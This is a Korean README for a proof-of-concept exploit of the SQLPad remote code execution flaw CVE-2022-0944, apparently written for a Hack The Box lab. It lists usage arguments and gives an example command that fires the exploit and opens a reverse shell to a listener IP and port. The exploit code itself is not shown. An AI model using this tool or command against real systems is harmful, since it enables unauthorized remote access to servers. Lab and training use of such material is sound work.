
SQLPad RCE(CVE-2022-0944)에 대한 개념 증명 익스플로잇으로, 공격자가 제어하는 리스너에 리버스 셸을 트리거합니다. 사이버 보안 교육용으로 제작되었습니다.
SQLPad RCE (CVE-2022-0944)에 대한 개념 증명 익스플로잇으로, 공격자 PC로의 리버스 쉘을 통한 RCE를 유발합니다.
usage: script.py URL IP PORT
positional arguments:
URL SQLPad의 URL
IP 리버스 쉘을 위한 리스너 호스트 주소
PORT 리버스 쉘을 위한 리스너 포트
예시:
# 익스플로잇 실행
./script.py http://admin.sightless.htb 10.10.11.2 443
이 저장소에는 사이버 보안 학습 환경에서의 사용을 목적으로 하는 교육용 도구만 포함되어 있습니다. 이 코드의 작성자는 이 코드의 사용, 오용 또는 수정으로 인해 발생하는 모든 결과에 대해 책임을 지지 않습니다. 이 코드는 어떠한 명시적 또는 묵시적 보증 없이 "있는 그대로" 제공되며, 상품성 또는 특정 목적에의 적합성에 대한 묵시적 보증을 포함하되 이에 국한되지 않습니다.